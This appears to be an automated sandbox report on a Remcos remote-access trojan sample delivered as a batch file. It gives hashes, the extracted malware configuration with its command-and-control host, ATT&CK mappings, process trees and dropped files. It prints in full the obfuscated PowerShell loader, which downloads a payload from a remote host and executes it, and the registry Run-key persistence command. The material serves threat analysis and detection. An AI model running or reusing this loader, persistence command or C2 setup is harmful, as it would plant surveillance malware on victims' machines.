remcos | 4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959

General

Target

4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959.bat
Size

6KB
MD5

79c452316f1b510462cf29f5fbbd84ba
SHA1

2f95ab9367e8ef18427e2a8568afffbe0f197f22
SHA256

4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959
SHA512

9db2ed31b8fa24d38549707002fff53fc255630dca2b08c2c335816cabef1f57a4ab96fe01f41d65818a0cc58ecca770cb7c5697adbb65e3df53d7fe9f2c04e9
SSDEEP

192:zQTm8sMkAEm+nTPTBylI9lCu8JHDyOrhZT:zQTxkllTPVmICu8YOtJ

Score

10^/10

remcos power discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

power

C2

pikolee.duckdns.org:51525

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MC4T64
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	1588	powershell.exe
7	564	msiexec.exe
9	564	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1588	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Forsnakket154 = "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\\Software\\Driftsikkerheds\\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
564	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2512	powershell.exe
564	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
2512	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1416	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1588	powershell.exe
2512	powershell.exe
2512	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2512	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2920 wrote to memory of 1588	2920	cmd.exe	29
PID 2920 wrote to memory of 1588	2920	cmd.exe	29
PID 2920 wrote to memory of 1588	2920	cmd.exe	29
PID 2512 wrote to memory of 564	2512	powershell.exe	34
PID 2512 wrote to memory of 564	2512	powershell.exe	34
PID 2512 wrote to memory of 564	2512	powershell.exe	34
PID 2512 wrote to memory of 564	2512	powershell.exe	34
PID 2512 wrote to memory of 564	2512	powershell.exe	34
PID 2512 wrote to memory of 564	2512	powershell.exe	34
PID 2512 wrote to memory of 564	2512	powershell.exe	34
PID 2512 wrote to memory of 564	2512	powershell.exe	34
PID 564 wrote to memory of 344	564	msiexec.exe	35
PID 564 wrote to memory of 344	564	msiexec.exe	35
PID 564 wrote to memory of 344	564	msiexec.exe	35
PID 564 wrote to memory of 344	564	msiexec.exe	35
PID 344 wrote to memory of 1416	344	cmd.exe	37
PID 344 wrote to memory of 1416	344	cmd.exe	37
PID 344 wrote to memory of 1416	344	cmd.exe	37
PID 344 wrote to memory of 1416	344	cmd.exe	37

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- System Time Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:344
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Time Discovery

1

T1124

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GM66HKA5WKBWX20P0GNN.temp

Filesize
7KB

MD5
78c73f0586a9e032209720429357acde

SHA1
0948355799e13ede70f48d6bb929243bc965b9ce

SHA256
be0c4ee1d4fd84b342fa0fc9c9b0afa800cd8bdd017cffde7f0be01effd4835a

SHA512
5848d0c766e2f48e90cd5784b52f0ec09eba63b060b62998c839ecd2c5fd7a6c0a75bf5730034f881acec37ff044f9ae8a8a39ac57b9f189296cf485cf86a1ff

Download Submit
C:\Users\Admin\AppData\Roaming\Unslave.Mel

Filesize
482KB

MD5
39858943e5706782a2e5b0c5791511de

SHA1
ac3ba663425edcc14c79b58d933f6dd6ad46dec4

SHA256
1e187e2094f3aeca9a210e974cddaf48521ced815f2127cad6df88fe1cb26f96

SHA512
9c4bf3856aa9deb997e390812711ef7091772dcd46594bd0f1fcfbddd75fb68a6fff2e8280335c3ea749f2cc0849a5274471e1daa7e50b2587b8eea41390184e

Download Submit
memory/564-35-0x00000000004F0000-0x0000000001552000-memory.dmp

Filesize
16.4MB

Download
memory/1588-10-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

Filesize
9.6MB

Download
memory/1588-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/1588-5-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/1588-4-0x000007FEF665E000-0x000007FEF665F000-memory.dmp

Filesize
4KB

Download
memory/1588-12-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

Filesize
9.6MB

Download
memory/1588-13-0x000007FEF665E000-0x000007FEF665F000-memory.dmp

Filesize
4KB

Download
memory/1588-15-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

Filesize
9.6MB

Download
memory/1588-9-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

Filesize
9.6MB

Download
memory/1588-8-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

Filesize
9.6MB

Download
memory/1588-7-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2512-19-0x00000000065B0000-0x00000000087A9000-memory.dmp

Filesize
34.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads